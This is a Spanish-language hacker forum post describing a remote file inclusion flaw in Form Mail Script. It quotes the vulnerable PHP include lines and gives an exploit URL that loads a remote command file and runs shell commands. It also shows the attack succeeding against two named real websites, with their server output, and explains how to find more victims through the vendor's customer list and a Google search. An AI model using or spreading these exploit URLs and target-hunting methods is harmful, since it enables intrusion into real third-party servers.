Hace unos dias se publico una falla en Form Mail Script, como lo dice el nombre, es un formulario de contacto muy usado por los Servidores de Hosting
...
Url del Bug:
http://www.securitytracker.com/alerts/2005/Mar/1013378.html El Bug es una inclusion..
...
/*****************************************************
** Include functions
*****************************************************/
include $script_root . 'inc/functions.inc.php';
include $script_root . 'inc/template.class.inc.php';
include $script_root . 'inc/template.ext.class.inc.php';
include $script_root . 'inc/formmail.class.inc.php';
...
include $script_root . 'languages/language.' . $language . '.inc.php';
...
Lo cual se Explotaria:
http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://server/evil.txt?&cmd=id;uname -a
Con esto explotamos como un RFI
...
** Buscando Objetivos Vulnerables **
La web del Vendedor del Script tiene enlaces a webs que utilizan el Script
..
http://www.stadtaus.com/users/es.php Ejemplo:
http://www.greenpolarbear.com/contact/inc/formmail.inc.php?script_root=http://ar.geocities.com/anti_politica/cmd.txt?&cmd=id;uname%20-a uid=15691(eifrig) gid=100(vuser) groups=100(vuser) FreeBSD eifrig.com 4.7-RELEASE-p27 FreeBSD 4.7-RELEASE-p27 #38: Thu Aug 26 17:44:26 MDT 2004 root @fc2:/usr/src/sys/compile/VKERN i386
Lindo FreeBSD
...
-------------------------
http://www.pidelo.cl/form_mail/inc/formmail.inc.php?script_root=http://ar.geocities.com/anti_politica/cmd.txt?&cmd=id;uname%20-a uid=99(nobody) gid=99(nobody) groups=99(nobody) Linux server1.axs.cl 2.4.20-31.9 #1 Tue Apr 13 18:04:23 EDT 2004 i686 i686 i386 GNU/Linux
-------------------------
** Usando Google :=) **
"Powered by Form Mail Script"
Resultados 1 - 10 de aproximadamente 525 de "Powered by Form Mail Script". (0,33 segundos)
Lindo Resultado
.... Esto es todo...simple y basico :=)...
Autor: Nikyt0x
Autor